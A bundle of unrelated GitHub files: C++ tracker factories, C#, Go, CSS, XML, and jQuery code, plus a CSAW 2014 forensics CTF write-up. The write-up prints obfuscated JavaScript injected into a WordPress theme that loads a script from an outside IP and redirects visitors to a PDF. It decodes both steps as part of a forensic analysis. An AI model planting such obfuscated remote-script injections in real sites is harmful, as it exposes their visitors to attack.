*/ static ITMTracker *MakeColourTracker(const Vector2i& imgSize_rgb, const Vector2i& imgSize_d, ITMLibSettings::DeviceType deviceType, const ORUtils::KeyValueConfig & cfg, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) { int verbose = 0; if (cfg.getProperty("help") != NULL) if (verbose < 10) verbose = 10; const char *levelSetup = "rrrbb"; cfg.parseStrProperty("levels", "resolution hierarchy levels", levelSetup, verbose); std::vector<TrackerIterationType> levels = parseLevelConfig(levelSetup); ITMColorTracker *ret = NULL; switch (deviceType) { case ITMLibSettings::DEVICE_CPU: ret = new ITMColorTracker_CPU(imgSize_rgb, &(levels[0]), static_cast<int>(levels.size()), lowLevelEngine); break; case ITMLibSettings::DEVICE_CUDA: #ifndef COMPILE_WITHOUT_CUDA ret = new ITMColorTracker_CUDA(imgSize_rgb, &(levels[0]), static_cast<int>(levels.size()), lowLevelEngine); #endif break; case ITMLibSettings::DEVICE_METAL: #ifdef COMPILE_WITH_METAL ret = new ITMColorTracker_CPU(imgSize_rgb, &(levels[0]), static_cast<int>(levels.size()), lowLevelEngine); #endif break; } if (ret==NULL) DIEWITHEXCEPTION("Failed to make colour tracker"); return ret; } /** * \brief Makes an ICP tracker. 
*/ static ITMTracker *MakeICPTracker(const Vector2i& imgSize_rgb, const Vector2i& imgSize_d, ITMLibSettings::DeviceType deviceType, const ORUtils::KeyValueConfig & cfg, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) { const char *levelSetup = "rrrbb"; float smallStepSizeCriterion = 1e-3f; float outlierDistanceFine = 0.002f; float outlierDistanceCoarse = 0.01f; float failureDetectorThd = 3.0f; int numIterationsCoarse = 10; int numIterationsFine = 2; int verbose = 0; if (cfg.getProperty("help") != NULL) if (verbose < 10) verbose = 10; cfg.parseStrProperty("levels", "resolution hierarchy levels", levelSetup, verbose); std::vector<TrackerIterationType> levels = parseLevelConfig(levelSetup); cfg.parseFltProperty("minstep", "step size threshold for convergence", smallStepSizeCriterion, verbose); cfg.parseFltProperty("outlierC", "outlier threshold at coarsest level", outlierDistanceCoarse, verbose); cfg.parseFltProperty("outlierF", "outlier threshold at finest level", outlierDistanceFine, verbose); cfg.parseIntProperty("numiterC", "maximum number of iterations at coarsest level", numIterationsCoarse, verbose); cfg.parseIntProperty("numiterF", "maximum number of iterations at finest level", numIterationsFine, verbose); cfg.parseFltProperty("failureDec", "threshold for the failure detection", failureDetectorThd, verbose); ITMDepthTracker *ret = NULL; switch (deviceType) { case ITMLibSettings::DEVICE_CPU: ret = new ITMDepthTracker_CPU(imgSize_d, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, lowLevelEngine); break; case ITMLibSettings::DEVICE_CUDA: #ifndef COMPILE_WITHOUT_CUDA ret = new ITMDepthTracker_CUDA(imgSize_d, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, lowLevelEngine); #endif break; case ITMLibSettings::DEVICE_METAL: #ifdef COMPILE_WITH_METAL ret = new ITMDepthTracker_CPU(imgSize_d, &(levels[0]), 
static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, lowLevelEngine); #endif break; } if (ret == NULL) DIEWITHEXCEPTION("Failed to make ICP tracker"); ret->SetupLevels(numIterationsCoarse, numIterationsFine, outlierDistanceCoarse, outlierDistanceFine); return ret; } /** * \brief Makes an Extended tracker. */ static ITMTracker *MakeExtendedTracker(const Vector2i& imgSize_rgb, const Vector2i& imgSize_d, ITMLibSettings::DeviceType deviceType, const ORUtils::KeyValueConfig & cfg, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) { const char *levelSetup = "rrbb"; bool useDepth = true; bool useColour = false; float colourWeight = 0.3f; float smallStepSizeCriterion = 1e-4f; float outlierSpaceDistanceFine = 0.004f; float outlierSpaceDistanceCoarse = 0.1f; float outlierColourDistanceFine = 0.175f; float outlierColourDistanceCoarse = 0.005f; float failureDetectorThd = 3.0f; float minColourGradient = 0.01f; float tukeyCutOff = 8.0f; int framesToSkip = 20; int framesToWeight = 50; int numIterationsCoarse = 20; int numIterationsFine = 20; int verbose = 0; if (cfg.getProperty("help") != NULL) if (verbose < 10) verbose = 10; cfg.parseStrProperty("levels", "resolution hierarchy levels", levelSetup, verbose); std::vector<TrackerIterationType> levels = parseLevelConfig(levelSetup); cfg.parseBoolProperty("useDepth", "use ICP based tracking", useDepth, verbose); cfg.parseBoolProperty("useColour", "use colour based tracking", useColour, verbose); cfg.parseFltProperty("colourWeight", "weight used to scale colour errors and jacobians when both useColour and useWeights are set", colourWeight, verbose); cfg.parseFltProperty("minstep", "step size threshold for convergence", smallStepSizeCriterion, verbose); cfg.parseFltProperty("outlierSpaceC", "space outlier threshold at coarsest level", outlierSpaceDistanceCoarse, verbose); cfg.parseFltProperty("outlierSpaceF", "space outlier threshold at finest level", 
outlierSpaceDistanceFine, verbose); cfg.parseFltProperty("outlierColourC", "colour outlier threshold at coarsest level", outlierColourDistanceCoarse, verbose); cfg.parseFltProperty("outlierColourF", "colour outlier threshold at finest level", outlierColourDistanceFine, verbose); cfg.parseFltProperty("minColourGradient", "minimum colour gradient for a pixel to be used in the tracking", minColourGradient, verbose); cfg.parseIntProperty("numiterC", "maximum number of iterations at coarsest level", numIterationsCoarse, verbose); cfg.parseIntProperty("numiterF", "maximum number of iterations at finest level", numIterationsFine, verbose); cfg.parseFltProperty("tukeyCutOff", "cutoff for the tukey m-estimator", tukeyCutOff, verbose); cfg.parseIntProperty("framesToSkip", "number of frames to skip before depth pixel is used for tracking", framesToSkip, verbose); cfg.parseIntProperty("framesToWeight", "number of frames to weight each depth pixel for before using it fully", framesToWeight, verbose); cfg.parseFltProperty("failureDec", "threshold for the failure detection", failureDetectorThd, verbose); ITMExtendedTracker *ret = NULL; switch (deviceType) { case ITMLibSettings::DEVICE_CPU: ret = new ITMExtendedTracker_CPU(imgSize_d, imgSize_rgb, useDepth, useColour, colourWeight, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, sceneParams->viewFrustum_min, sceneParams->viewFrustum_max, minColourGradient, tukeyCutOff, framesToSkip, framesToWeight, lowLevelEngine); break; case ITMLibSettings::DEVICE_CUDA: #ifndef COMPILE_WITHOUT_CUDA ret = new ITMExtendedTracker_CUDA(imgSize_d, imgSize_rgb, useDepth, useColour, colourWeight, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, sceneParams->viewFrustum_min, sceneParams->viewFrustum_max, minColourGradient, tukeyCutOff, framesToSkip, framesToWeight, lowLevelEngine); #endif break; case ITMLibSettings::DEVICE_METAL: #ifdef COMPILE_WITH_METAL ret = new 
ITMExtendedTracker_Metal(imgSize_d, imgSize_rgb, useDepth, useColour, colourWeight, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, scene->sceneParams->viewFrustum_min, scene->sceneParams->viewFrustum_max, tukeyCutOff, framesToSkip, framesToWeight, lowLevelEngine); #endif break; } if (ret == NULL) DIEWITHEXCEPTION("Failed to make extended tracker"); ret->SetupLevels(numIterationsCoarse, numIterationsFine, outlierSpaceDistanceCoarse, outlierSpaceDistanceFine, outlierColourDistanceCoarse, outlierColourDistanceFine); return ret; } /** * \brief Makes an IMU tracker. */ static ITMTracker* MakeIMUTracker(const Vector2i& imgSize_rgb, const Vector2i& imgSize_d, ITMLibSettings::DeviceType deviceType, const ORUtils::KeyValueConfig & cfg, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) { const char *levelSetup = "tb"; float smallStepSizeCriterion = 1e-3f; float outlierDistanceFine = 0.005f; float outlierDistanceCoarse = 0.01f; float failureDetectorThd = 3.0f; int numIterationsCoarse = 4; int numIterationsFine = 2; int verbose = 0; if (cfg.getProperty("help") != NULL) if (verbose < 10) verbose = 10; cfg.parseStrProperty("levels", "resolution hierarchy levels", levelSetup, verbose); std::vector<TrackerIterationType> levels = parseLevelConfig(levelSetup); cfg.parseFltProperty("minstep", "step size threshold for convergence", smallStepSizeCriterion, verbose); cfg.parseFltProperty("outlierC", "outlier threshold at coarsest level", outlierDistanceCoarse, verbose); cfg.parseFltProperty("outlierF", "outlier threshold at finest level", outlierDistanceFine, verbose); cfg.parseIntProperty("numiterC", "maximum number of iterations at coarsest level", numIterationsCoarse, verbose); cfg.parseIntProperty("numiterF", "maximum number of iterations at finest level", numIterationsFine, verbose); cfg.parseFltProperty("failureDec", "threshold for the failure detection", failureDetectorThd, 
verbose); ITMDepthTracker *dTracker = NULL; switch (deviceType) { case ITMLibSettings::DEVICE_CPU: dTracker = new ITMDepthTracker_CPU(imgSize_d, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, lowLevelEngine); break; case ITMLibSettings::DEVICE_CUDA: #ifndef COMPILE_WITHOUT_CUDA dTracker = new ITMDepthTracker_CUDA(imgSize_d, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, lowLevelEngine); #endif break; case ITMLibSettings::DEVICE_METAL: #ifdef COMPILE_WITH_METAL dTracker = new ITMDepthTracker_CPU(imgSize_d, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, lowLevelEngine); #endif break; default: break; } if (dTracker == NULL) DIEWITHEXCEPTION("Failed to make IMU tracker"); dTracker->SetupLevels(numIterationsCoarse, numIterationsFine, outlierDistanceCoarse, outlierDistanceFine); ITMCompositeTracker *compositeTracker = new ITMCompositeTracker; compositeTracker->AddTracker(new ITMIMUTracker(imuCalibrator)); compositeTracker->AddTracker(dTracker); return compositeTracker; } /** * \brief Makes an Extended IMU tracker. */ static ITMTracker* MakeExtendedIMUTracker(const Vector2i& imgSize_rgb, const Vector2i& imgSize_d, ITMLibSettings::DeviceType deviceType, const ORUtils::KeyValueConfig & cfg, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) { ITMTracker *dTracker = MakeExtendedTracker(imgSize_rgb, imgSize_d, deviceType, cfg, lowLevelEngine, imuCalibrator, sceneParams); if (dTracker == NULL) DIEWITHEXCEPTION("Failed to make extended tracker"); // Should never happen though ITMCompositeTracker *compositeTracker = new ITMCompositeTracker; compositeTracker->AddTracker(new ITMIMUTracker(imuCalibrator)); compositeTracker->AddTracker(dTracker); return compositeTracker; } /** * \brief Makes a file based tracker. 
*/ static ITMTracker *MakeFileBasedTracker(const Vector2i& imgSize_rgb, const Vector2i& imgSize_d, ITMLibSettings::DeviceType deviceType, const ORUtils::KeyValueConfig & cfg, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) { int verbose = 0; if (cfg.getProperty("help") && verbose < 10) verbose = 10; const char *fileMask = ""; int initialFrameNo = 0; cfg.parseStrProperty("mask", "mask for the saved pose text files", fileMask, verbose); cfg.parseIntProperty("initialFrameNo", "initial frame index to use for tracking", initialFrameNo, verbose); return new ITMFileBasedTracker(fileMask, initialFrameNo); } /** * \brief Makes a force fail tracker. */ static ITMTracker *MakeForceFailTracker(const Vector2i& imgSize_rgb, const Vector2i& imgSize_d, ITMLibSettings::DeviceType deviceType, const ORUtils::KeyValueConfig & cfg, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) { return new ITMForceFailTracker; } }; }
{ "pile_set_name": "Github" }
namespace N2.Persistence.Serialization
{
    /// <summary>
    /// Signals a version mismatch encountered while deserializing
    /// persisted/imported data (specialization of
    /// <see cref="DeserializationException"/>).
    /// </summary>
    public class WrongVersionException : DeserializationException
    {
        /// <summary>Creates the exception.</summary>
        /// <param name="message">Description of the version mismatch.</param>
        public WrongVersionException(string message)
            : base(message)
        {
        }
    }
}
{ "pile_set_name": "Github" }
// Mock of a GNOME Files ("Nautilus") path bar with a right-click context
// menu, built on jQuery + webui-popover.

// Directory names used to grow the path one segment at a time.
var PTEMPLATE = ['Home', 'Documents', 'Events', '2015', 'GUADEC Team Reports'];

// Context-menu entries; empty strings become separator-like items.
var MENU = ['Open in new Window', 'Open in New Tab', '', 'Move to…', 'Copy to…',
            'Add to Bookmarks', 'Rename…', '', 'Properties'];

// State + rendering for the path bar.
var PATH = {
    // Directory segments currently shown.
    dirs: [],

    // Appends the next segment from PTEMPLATE (if any) and makes it the
    // active one; disables the "add" button once the template is exhausted.
    addDir: function () {
        if (PTEMPLATE[this.dirs.length]) {
            this.dirs.push(PTEMPLATE[this.dirs.length]);
            this.active = this.dirs.length - 1;
        }
        if (!PTEMPLATE[this.dirs.length]) {
            $("#add").attr("disabled", "true");
        }
    },

    // Index of the currently active (highlighted) segment.
    active: 0,

    // Marks the clicked <li> as active and clears its siblings.
    setActive: function ($x) {
        if ($x.children('a').length) {
            // BUG FIX: .index() is a method. The original assigned the
            // function itself (`$x.index`), leaving PATH.active holding a
            // function reference so renderOut() could never match it.
            this.active = $x.index();
            $x.addClass('active')
                .siblings().removeClass('active');
        }
    },

    forkFromActive: function () {
    },

    // Rebuilds the path bar markup inside $pb from PATH.dirs.
    renderOut: function ($pb) {
        //console.log($pb,this.dirs);
        var h = [];
        $.each(PATH.dirs, function (i, dir) {
            h.push('<li');
            if (i == PATH.active) {
                h.push(' class="active"');
            }
            h.push('><a href="#" class="hasPopover">' + PATH.dirs[i] + '</a></li>');
            // Separator after every segment except the last possible one.
            if (PTEMPLATE[i + 1]) {
                h.push(' <li><span class="divider">/</span></li> ');
            }
        });
        $pb.html(h.join(''));
    }
};

$(document).ready(function () {
    var $hb = $("#headerbar"),
        $pb = $("#pathbar"),
        buttonwhitespace = 235; // px reserved for the buttons next to the bar

    // Context menu on path segments; delegated so it also binds to
    // elements created later by renderOut().
    $('#pathbar').on("contextmenu", ".hasPopover", function (ev) {
        /* bind an event to elements to be created */
        $('.hasPopover').webuiPopover({
            trigger: 'manual',
            animation: 'gnomeslide',
            placement: 'bottom',
            dismissible: false, // Handled in $(document), below
            content: function () {
                var html = '<ul>';
                $.each(MENU, function (i, item) {
                    html += "<li><a href='#'>" + item + "</a></li>";
                });
                html += "</ul>";
                return html;
            }
        });
        $(this).webuiPopover('toggle');
        $('.webui-popover-content a').click(function () {
            /* clicking on any menu item dismisses the popover */
            $('.hasPopover').webuiPopover('hide');
        });
        ev.preventDefault();
    });

    $pb.css("width", $hb.width() - buttonwhitespace); // set pathbar width

    $("#add").click(function () {
        PATH.addDir();
        PATH.renderOut($("ul.pathbar"));
    });
    $("#add").click(); // first item (Home) should be visible

    $(window).resize(function () {
        $pb.css('width', $hb.width() - buttonwhitespace); // set pathbar width
    });

    $(document).on('mousedown', function (ev) {
        // Check if the origin is part of an actual popover
        var match = $(ev.target).closest('.hasPopover,.webui-popover').length > 0;
        if (!match) {
            $('.hasPopover').webuiPopover('hide');
        }
    }).contextmenu(function (ev) {
        // Suppress the browser context menu outside of the popover targets
        ev.preventDefault();
    });

    $('#pathbar').on('mousedown', function (ev) {
        // set clicked menu entry as active
        //console.log($(ev.target).closest('li').siblings())
        PATH.setActive($(ev.target).closest('li'));
    });
});
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <databaseChangeLog xmlns="http://www.liquibase.org/xml/ns/dbchangelog/1.9" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.liquibase.org/xml/ns/dbchangelog/1.9 http://www.liquibase.org/xml/ns/dbchangelog/dbchangelog-1.9.xsd"> <changeSet author="jmiranda" id="1498672238798-1"> <sql> UPDATE product_group SET name = description, description = NULL; </sql> </changeSet> <changeSet author="jmiranda" id="1498672238798-2"> <comment>Move name column to make it easier to read.</comment> <sql> ALTER TABLE product_group MODIFY name varchar(255) AFTER id; </sql> </changeSet> </databaseChangeLog>
{ "pile_set_name": "Github" }
/*! * Durandal 2.0.0 Copyright (c) 2012 Blue Spire Consulting, Inc. All Rights Reserved. * Available via the MIT license. * see: http://durandaljs.com or https://github.com/BlueSpire/Durandal for details */ .modalBlockout { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: black; opacity: 0; pointer-events: auto; -webkit-backface-visibility: hidden; -webkit-transition: opacity 0.1s linear; -moz-transition: opacity 0.1s linear; -o-transition: opacity 0.1s linear; transition: opacity 0.1s linear; } .modalHost { top: 50%; left: 50%; position: fixed; opacity: 0; -webkit-backface-visibility: hidden; -webkit-transition: opacity 0.1s linear; -moz-transition: opacity 0.1s linear; -o-transition: opacity 0.1s linear; transition: opacity 0.1s linear; } .messageBox { background-color: white; border: 1px solid #999; border: 1px solid rgba(0, 0, 0, 0.3); -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; outline: none; -webkit-box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3); -moz-box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3); box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3); -webkit-background-clip: padding-box; -moz-background-clip: padding-box; background-clip: padding-box; min-width: 300px; } .durandal-view-404 { color: red; margin: 8px 0; padding: 8px; -webkit-box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3); -moz-box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3); box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3); border: 1px solid #999; border: 1px solid rgba(0, 0, 0, 0.3); -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; }
{ "pile_set_name": "Github" }
list ==l list ==m /foo l .append /bar l .append /quux l .append l { dump } each [ /a /b /c ] m .append m { dump } each m len dump 2 m * dump [ /a /b /c ] m .append1 m { dump } each list _ [ 1 2 3 ] -01 .append list _ [ 3 4 5 ] -01 .append add ==a a dump a len dump a |dump each a .pop a dump a len dump a |dump each 42 a .append a dump a len dump a |dump each
{ "pile_set_name": "Github" }
// Include guard: prevents multiple inclusion of this header.
#ifndef TEST1
#define TEST1

#include "test2.hh"

// Forward declaration; the definition lives in another translation unit.
void test1();

#endif  // TEST1
{ "pile_set_name": "Github" }
// Copyright 2019 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.

// +build go1.13

// Package ed25519 implements the Ed25519 signature algorithm. See
// https://ed25519.cr.yp.to/.
//
// These functions are also compatible with the “Ed25519” function defined in
// RFC 8032. However, unlike RFC 8032's formulation, this package's private key
// representation includes a public key suffix to make multiple signing
// operations with the same key more efficient. This package refers to the RFC
// 8032 private key as the “seed”.
//
// Beginning with Go 1.13, the functionality of this package was moved to the
// standard library as crypto/ed25519. This package only acts as a compatibility
// wrapper.
package ed25519

import (
	"crypto/ed25519"
	"io"
)

const (
	// PublicKeySize is the size, in bytes, of public keys as used in this package.
	PublicKeySize = 32
	// PrivateKeySize is the size, in bytes, of private keys as used in this package.
	PrivateKeySize = 64
	// SignatureSize is the size, in bytes, of signatures generated and verified by this package.
	SignatureSize = 64
	// SeedSize is the size, in bytes, of private key seeds. These are the private key representations used by RFC 8032.
	SeedSize = 32
)

// PublicKey is the type of Ed25519 public keys.
//
// This type is an alias for crypto/ed25519's PublicKey type.
// See the crypto/ed25519 package for the methods on this type.
type PublicKey = ed25519.PublicKey

// PrivateKey is the type of Ed25519 private keys. It implements crypto.Signer.
//
// This type is an alias for crypto/ed25519's PrivateKey type.
// See the crypto/ed25519 package for the methods on this type.
type PrivateKey = ed25519.PrivateKey

// GenerateKey generates a public/private key pair using entropy from rand.
// If rand is nil, crypto/rand.Reader will be used.
//
// It delegates directly to the standard library implementation.
func GenerateKey(rand io.Reader) (PublicKey, PrivateKey, error) {
	return ed25519.GenerateKey(rand)
}

// NewKeyFromSeed calculates a private key from a seed. It will panic if
// len(seed) is not SeedSize. This function is provided for interoperability
// with RFC 8032. RFC 8032's private keys correspond to seeds in this
// package.
//
// It delegates directly to the standard library implementation.
func NewKeyFromSeed(seed []byte) PrivateKey {
	return ed25519.NewKeyFromSeed(seed)
}

// Sign signs the message with privateKey and returns a signature. It will
// panic if len(privateKey) is not PrivateKeySize.
//
// The returned signature is SignatureSize bytes long; the call delegates
// directly to the standard library implementation.
func Sign(privateKey PrivateKey, message []byte) []byte {
	return ed25519.Sign(privateKey, message)
}

// Verify reports whether sig is a valid signature of message by publicKey. It
// will panic if len(publicKey) is not PublicKeySize.
//
// It delegates directly to the standard library implementation.
func Verify(publicKey PublicKey, message, sig []byte) bool {
	return ed25519.Verify(publicKey, message, sig)
}
{ "pile_set_name": "Github" }
# CSAW CTF 2014: Fluffy No More **Category:** Forensics **Points:** 300 **Description:** > OH NO WE'VE BEEN HACKED!!!!!! -- said the Eye Heart Fluffy Bunnies Blog owner. Life was grand for the fluff fanatic until one day the site's users started to get attacked! Apparently fluffy bunnies are not just a love of fun furry families but also furtive foreign governments. The notorious "Forgotten Freaks" hacking group was known to be targeting high powered politicians. Were the cute bunnies the next in their long list of conquests!?? > > Well... The fluff needs your stuff. I've pulled the logs from the server for you along with a backup of its database and configuration. Figure out what is going on! > > Written by brad_anton > > [CSAW2014-FluffyNoMore-v0.1.tar.bz2](CSAW2014-FluffyNoMore-v0.1.tar.bz2) ## Write-up As its extension suggests, [the provided `CSAW2014-FluffyNoMore-v0.1.tar.bz2` file](CSAW2014-FluffyNoMore-v0.1.tar.bz2) is a bzip2-compressed tarball: ```bash $ file CSAW2014-FluffyNoMore-v0.1.tar.bz2 CSAW2014-FluffyNoMore-v0.1.tar.bz2: bzip2 compressed data, block size = 900k ``` Let’s extract it: ```bash $ tar xjfv CSAW2014-FluffyNoMore-v0.1.tar.bz2 x CSAW2014-FluffyNoMore-v0.1/ x CSAW2014-FluffyNoMore-v0.1/etc_directory.tar.bz2 x CSAW2014-FluffyNoMore-v0.1/logs.tar.bz2 x CSAW2014-FluffyNoMore-v0.1/mysql_backup.sql.bz2 x CSAW2014-FluffyNoMore-v0.1/webroot.tar.bz2 ``` Oh, it contains more tarballs! 
Let’s extract those as well: ```bash $ cd CSAW2014-FluffyNoMore-v0.1 $ for file in *.tar.bz2; do mkdir -p "${file}-extracted"; tar --directory "${file}-extracted" -xjf "${file}"; done ``` Viewing `logs.tar.bz2-extracted/var/log/auth.log` reveals an interesting entry: ``` Sep 17 19:20:09 ubuntu sudo: ubuntu : TTY=pts/0 ; PWD=/home/ubuntu/CSAW2014-WordPress/var/www ; USER=root ; COMMAND=/usr/bin/vi /var/www/html/wp-content/themes/twentythirteen/js/html5.js ``` Someone with root access to the server edited the web-exposed `/wp-content/themes/twentythirteen/js/html5.js` file. Reviewing the file’s contents (`webroot.tar.bz2-extracted/var/www/html/wp-content/themes/twentythirteen/js/html5.js`), it’s clear that some malicious JavaScript code was inserted. ```js var g="ti";var c="HTML Tags";var f=". li colgroup br src datalist script option .";f = f.split(" ");c="";k="/";m=f[6];for(var i=0;i<f.length;i++){c+=f[i].length.toString();}v=f[0];x="\'ht";b=f[4];f=2541*6-35+46+12-15269;c+=f.toString();f=(56+31+68*65+41-548)/4000-1;c+=f.toString();f="";c=c.split("");var w=0;u="s";for(var i=0;i<c.length;i++){if(((i==3||i==6)&&w!=2)||((i==8)&&w==2)){f+=String.fromCharCode(46);w++;}f+=c[i];} i=k+"anal"; document.write("<"+m+" "+b+"="+x+"tp:"+k+k+f+i+"y"+g+"c"+u+v+"j"+u+"\'>\</"+m+"\>"); ``` The above script is equivalent to the following: ```js document.write("<script src='http://128.238.66.100/analytics.js'><\/script>"); ``` Let’s download [the `analytics.js` file](analytics.js) so we can take a look at it: ```bash $ wget http://128.238.66.100/analytics.js ``` The file consists of minified code, most of which is legitimate. 
A small part of it stands out because it’s obfuscated, though: ```js var _0x91fe=["\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66","\x5F\x73\x65\x6C\x66","\x6F\x70\x65\x6E"];window[_0x91fe[2]](_0x91fe[0],_0x91fe[1]); ``` This [is equivalent to](https://mothereff.in/js-escapes#1var%20%5f0x91fe%3D%5B%22%5Cx68%5Cx74%5Cx74%5Cx70%5Cx3A%5Cx2F%5Cx2F%5Cx31%5Cx32%5Cx38%5Cx2E%5Cx32%5Cx33%5Cx38%5Cx2E%5Cx36%5Cx36%5Cx2E%5Cx31%5Cx30%5Cx30%5Cx2F%5Cx61%5Cx6E%5Cx6E%5Cx6F%5Cx75%5Cx6E%5Cx63%5Cx65%5Cx6D%5Cx65%5Cx6E%5Cx74%5Cx2E%5Cx70%5Cx64%5Cx66%22%2C%22%5Cx5F%5Cx73%5Cx65%5Cx6C%5Cx66%22%2C%22%5Cx6F%5Cx70%5Cx65%5Cx6E%22%5D%3Bwindow%5B%5f0x91fe%5B2%5D%5D%28%5f0x91fe%5B0%5D%2C%5f0x91fe%5B1%5D%29%3B): ```js var _0x91fe=["http://128.238.66.100/announcement.pdf","_self","open"]; window[_0x91fe[2]](_0x91fe[0],_0x91fe[1]); ``` …which is equivalent to: ```js window.open('http://128.238.66.100/announcement.pdf', '_self'); ``` Let’s download [that `announcement.pdf` file](announcement.pdf): ```bash $ wget http://128.238.66.100/announcement.pdf ``` Opening the PDF file in [PDF Stream Dumper](http://sandsprite.com/blogs/index.php?uid=7&pid=57) reveals some hidden JavaScript code: ![](pdf-stream-dumper.png) ```js var _0xee0b=["\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D"];var y=_0xee0b[0]; ``` This [is equivalent 
to](https://mothereff.in/js-escapes#1var%20%5f0xee0b%3D%5B%22%5Cx59%5Cx4F%5Cx55%5Cx20%5Cx44%5Cx49%5Cx44%5Cx20%5Cx49%5Cx54%5Cx21%5Cx20%5Cx43%5Cx4F%5Cx4E%5Cx47%5Cx52%5Cx41%5Cx54%5Cx53%5Cx21%5Cx20%5Cx66%5Cx77%5Cx69%5Cx77%5Cx2C%5Cx20%5Cx6A%5Cx61%5Cx76%5Cx61%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx20%5Cx6F%5Cx62%5Cx66%5Cx75%5Cx73%5Cx63%5Cx61%5Cx74%5Cx69%5Cx6F%5Cx6E%5Cx20%5Cx69%5Cx73%5Cx20%5Cx73%5Cx6F%5Cx66%5Cx61%5Cx20%5Cx6B%5Cx69%5Cx6E%5Cx67%5Cx20%5Cx64%5Cx75%5Cx6D%5Cx62%5Cx20%5Cx20%5Cx3A%5Cx29%5Cx20%5Cx6B%5Cx65%5Cx79%5Cx7B%5Cx54%5Cx68%5Cx6F%5Cx73%5Cx65%5Cx20%5Cx46%5Cx6C%5Cx75%5Cx66%5Cx66%5Cx79%5Cx20%5Cx42%5Cx75%5Cx6E%5Cx6E%5Cx69%5Cx65%5Cx73%5Cx20%5Cx4D%5Cx61%5Cx6B%5Cx65%5Cx20%5Cx54%5Cx75%5Cx6D%5Cx6D%5Cx79%5Cx20%5Cx42%5Cx75%5Cx6D%5Cx70%5Cx79%5Cx7D%22%5D%3Bvar%20y%3D%5f0xee0b%5B0%5D%3B): ```js var _0xee0b=["YOU DID IT! CONGRATS! fwiw, javascript obfuscation is sofa king dumb :) key{Those Fluffy Bunnies Make Tummy Bumpy}"]; var y=_0xee0b[0]; ``` The flag is `Those Fluffy Bunnies Make Tummy Bumpy`. ## Other write-ups and resources * <http://balidani.blogspot.com/2014/09/csaw14-fluffy-no-more-writeup.html> * <http://sugarstack.io/csaw-2014-fluffy-no-more.html> * <https://hackucf.org/blog/csaw-2014-forensics-300-fluffy-no-more/> * <http://bt3gl.github.io/csaw-ctf-2014-forensics-300-fluffy-no-more.html> * <http://blog.squareroots.de/en/2014/09/csaw14-fluffy-no-more/>
{ "pile_set_name": "Github" }
{% load static %}
{# jqWidgets script bundle. Order matters: jqxcore must load first, and the #}
{# grid add-ons (selection, filter, sort, pager, …) must follow jqxgrid.     #}
<script src="{% static "vendor/jqwidgets/jqxcore.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxdata.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxbuttons.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxscrollbar.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxmenu.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxlistbox.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxdropdownlist.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxgrid.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxgrid.selection.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxgrid.columnsresize.js" %}" type="text/javascript"></script>
<script src="{% static "vendor/jqwidgets/jqxgrid.filter.js" %}" type="text/javascript"></script>
